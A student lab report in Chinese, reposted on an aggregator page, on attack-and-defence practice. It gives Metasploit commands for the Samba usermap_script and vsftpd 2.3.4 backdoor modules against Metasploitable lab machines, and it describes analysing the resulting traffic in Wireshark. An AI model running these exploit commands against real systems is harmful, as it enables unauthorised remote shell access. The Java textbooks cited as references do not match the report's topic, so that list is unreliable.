20232937文兆宇 2023-2024-2 《网络攻防实践》实践七报告

20232937文兆宇 2023-2024-2 《网络攻防实践》实践七报告

1.实践内容

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1使用Metasploit进行Linux远程渗透攻击

攻击机:kali(192.168.200.196)
靶机:metasploit(192.168.200.130)
打开msf
在这里插入图片描述
利用Samba服务Usermap_script安全漏洞

use exploit/multi/samba/usermap_script

设置攻击方和防守方

set LHOST 192.168.200.196
set RHOST 192.168.200.130

在这里插入图片描述
输入run进行攻击
在这里插入图片描述输入命令看看 证明攻击成功。
在这里插入图片描述

2.2实践作业:攻防对抗实践

攻击方

文兆宇:kali(192.168.43.68)
操昕:meta(192.168.43.231)
利用实验一的步骤

use exploit/multi/samba/usermap_script
set LHOST 192.168.43.68
set RHOST 192.168.43.231
run
show options

在这里插入图片描述输入命令
在这里插入图片描述
第二种攻击方式使用vsftp漏洞:
攻击:192.168.43.68
防守:192.168.43.231

use exploit/unix/ftp/vsftpd_234_backdoor
set LHOST 192.168.43.68
set RHOST 192.168.43.231
run
show options

在这里插入图片描述

防守方

操昕:kali(192.168.43.193)
文兆宇:meta(192.168.43.145)
在被攻击后,观察流量
发现192.168.43.193攻击最多 端口为smb
在这里插入图片描述攻击时间如下:
在这里插入图片描述利用漏洞脚本如下:
在这里插入图片描述发现攻击者命令如下:
在这里插入图片描述

在etc下创建了一个文件叫wzhsb
查看发现确实存在
在这里插入图片描述第二种攻击方式使用vsftp漏洞:
攻击:192.168.43.193
防守:192.168.43.145
这里是攻击者发起攻击的时间:
在这里插入图片描述

可以发现是ftp漏洞
在这里插入图片描述这里是攻击者的漏洞脚本,随后是攻击者输入的一些列命令,包括ls,创建文件等等。
在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:meta靶机链接不上桥接网络
  • 问题1解决方案:重新配置该虚拟机的ip地址,并重启,可以成功连接到网络

4.实践总结

通过本次实验我学习了很多linux相关的知识,熟悉了msf的使用方式,以及通过攻击和防守,学习到了黑客的攻击方式以及拿到shell后做的哪些命令,干了什么事,希望这次的学习可以帮助到之后的学习生活中。

参考资料

  • 《Java程序设计与数据结构教程(第二版)》
  • 《Java程序设计与数据结构教程(第二版)》学习指导

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/828854.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mysql 意向锁

文章目录 问题锁作用防止死锁提高并发性能问题 先看问题 事务A select * from table where id=1 for update会把id=1这一行锁住 事务B lock table in share mode这时B 想加表级别的共享锁,如果这时想加表级别的共享锁,那就要去挨个检查每行是不是有排它锁 ,这时如果在…

机器学习day3

一、距离度量 1.欧氏距离 2.曼哈顿距离 3.切比雪夫距离 4.闵可夫斯基距离 二、特征与处理 1.数据归一化 数据归一化是一种将数据按比例缩放,使之落入一个小的特定区间的过程。 代码实战 运行结果 2.数据标准化 数据标准化是将数据按照其均值和标准差进行缩放的过…

2024新版计算机网络视频教程65集完整版(视频+配套资料)

今日学计算机网络,众生皆叹难理解。 却见老师神乎其技,网络通畅如云烟。 协议层次纷繁复杂,ARP、IP、TCP、UDP。 路由器交换机相连,数据包穿梭无限。 网络安全重于泰山,防火墙、加密都来添。 恶意攻击时刻存在&#xf…

VUE3与Uniapp 三 (属性绑定)

<template><image :src"pic"></image><!-- 此时loading的false是字符串&#xff0c;不是布尔类型 --><button loading"false">按钮1</button><!-- 此时loading使用了属性绑定&#xff0c;这时的false是布尔类型 --…

python小知识:@property、@setter 使用

在 Python 中&#xff0c;property 是一种装饰器&#xff0c;可以将一个方法转换为属性&#xff0c;使其可以像访问属性一样被调用&#xff0c;而不是像调用方法一样。 使用 property 装饰器可以将一个方法转换为只读属性&#xff0c;也可以通过定义 setter 方法来实现可写属性…

Visual Studio Code使用

目录 1.python的调试 2.c的运行 方法1&#xff1a; 方法2&#xff1a; 3.c的调试 3.1调试方法一&#xff1a;先生成执行文件&#xff0c;再调试 3.2调试方法二&#xff1a;同时生成执行文件&#xff0c;调试 4.tasks.json 与launch.json文件的参考 4.1C生成执行文件tas…

AI视频教程下载:用ChatGPT和 MERN 堆栈构建 SAAS 项目

这是一个关于 掌握ChatGPT 开发应用的全面课程&#xff0c;它将带领你进入 AI 驱动的 SAAS 项目的沉浸式世界。该课程旨在使你具备使用动态的 MERN 堆栈和无缝的 Stripe 集成来构建强大的 SAAS 平台所需的技能。 你将探索打造智能解决方案的艺术&#xff0c;深入研究 ChatGPT 的…

【QT进阶】Qt线程与并发之QtConcurrent返回值与run方法的参数说明

往期回顾 【QT进阶】Qt线程与并发之线程和并发的简单介绍-CSDN博客 【QT进阶】Qt线程与并发之创建线程的三种方法(超详细介绍)-CSDN博客 【QT进阶】Qt线程与并发之QtConcurrent的简单介绍-CSDN博客 【QT进阶】Qt线程与并发之QtConcurrent返回值与run方法的参数说明 一、QtConc…

FMU精度问题

1.fmu存在的本质意义是连接来自不同学科的模型&#xff0c;进行多学科协同仿真&#xff0c;提高工作效率并降低开发成本&#xff0c;而不是对求解精度的复现&#xff1b; 2.建模工具的开发语言不确定&#xff0c;但是生成fmu的语言皆为C语言&#xff0c;所以每种开发语言、每款…

使用R语言进行简单的主成分分析(PCA)

主成分分析&#xff08;PCA&#xff09;是一种广泛使用的数据降维技术&#xff0c;它可以帮助我们识别数据中最重要的特征并简化复杂度&#xff0c;同时尽量保留原始数据的关键信息。在这篇文章中&#xff0c;我们将通过一个具体的例子&#xff0c;使用R语言实现PCA&#xff0c…

主成分分析(PCA):揭秘数据的隐藏结构

在数据分析的世界里&#xff0c;我们经常面临着处理高维数据的挑战。随着维度的增加&#xff0c;数据处理、可视化以及解释的难度也随之增加&#xff0c;这就是所谓的“维度的诅咒”。主成分分析&#xff08;PCA&#xff09;是一种强大的统计工具&#xff0c;用于减少数据的维度…

深度学习模型训练优化:并行化策略与参数拆分技术

目录 并行处理 1. 张量并行(Tensor Parallelism) 工作原理 优点 缺点

Maven的仓库、周期和插件

一、简介 随着各公司的Java项目入库方式由老的Ant改为Maven后&#xff0c;相信大家对Maven已经有了个基本的熟悉。但是在实际的使用、入库过程中&#xff0c;笔者发现挺多人对Maven的一些基本知识还缺乏了解&#xff0c;因此在此处跟大家简单地聊下Maven的相关内容&#xff0c…

二 SpringMVC接收数据

SpringMVC接收数据 一 访问路径以及指定请求方法 Controller public class UserController {/*** WebSevlet (" 必须以/开头")* RequstMapping(" 不要求 / 开头 ")*1. 精准地址 &#xff0c;多个 ("地址1“&#xff0c;”地址2“)* 2. 支持模糊查询…

基于STM32单片机的天然气与温湿度检测报警系统设计

基于STM32单片机的天然气与温湿度检测报警系统设计 一、引言 随着科技的发展和安全生产意识的提高&#xff0c;对于地下矿井等封闭环境中的天然气泄漏和温湿度变化的监控变得尤为重要。本文设计了一种基于STM32单片机的天然气与温湿度检测报警系统&#xff0c;旨在实时监控环…

OpenCV实现霍夫变换

返回:OpenCV系列文章目录&#xff08;持续更新中......&#xff09; 上一篇&#xff1a;OpenCV 如何实现边缘检测器 下一篇 :OpenCV 实现霍夫圆变换 目标 在本教程中&#xff0c;您将学习如何&#xff1a; 使用 OpenCV 函数 HoughLines()和 HoughLinesP()检测图像中的线条。…

Error opening file a bytes-like object is required,not ‘NoneType‘

错误显示&#xff0c;打开的是一个无效路径的文件 查看json文件内容&#xff0c;索引的路径与json文件保存的路径不同 方法&#xff1a;使用python脚本统一修改json文件路径 import json import os import argparse import cv2 from tqdm import tqdm import numpy as np impo…

python爬虫学习------scrapy第二部分(第三十天)

&#x1f388;&#x1f388;作者主页&#xff1a; 喔的嘛呀&#x1f388;&#x1f388; &#x1f388;&#x1f388;所属专栏&#xff1a;python爬虫学习&#x1f388;&#x1f388; ✨✨谢谢大家捧场&#xff0c;祝屏幕前的小伙伴们每天都有好运相伴左右&#xff0c;一定要天天…

10、了解JVM判断对象可回收的神秘法则!

10.1、垃圾回收触发时机? 在我们之前的学习中,我们已经了解到,当我们的系统在运行过程中创建对象时,这些对象通常会被优先分配在所谓的“新生代”内存区域,如下图所示。 在新生代中,当对象数量逐渐增多,接近填满整个空间时,会触发垃圾回收机制。这个机制的作用是回收…

LabVIEW专栏七、队列

目录 一、队列范例二、命令簇三、队列应用1.1、并行循环队列1.2、命名队列和匿名队列1.2.1、命名队列1.2.2、匿名队列 1.3、长度为1的队列 队列是一种特殊的线性表&#xff0c;就是队列里的元素都是按照顺序进出。 队列的数据元素又称为队列元素。在队列中插入一个队列元素称为…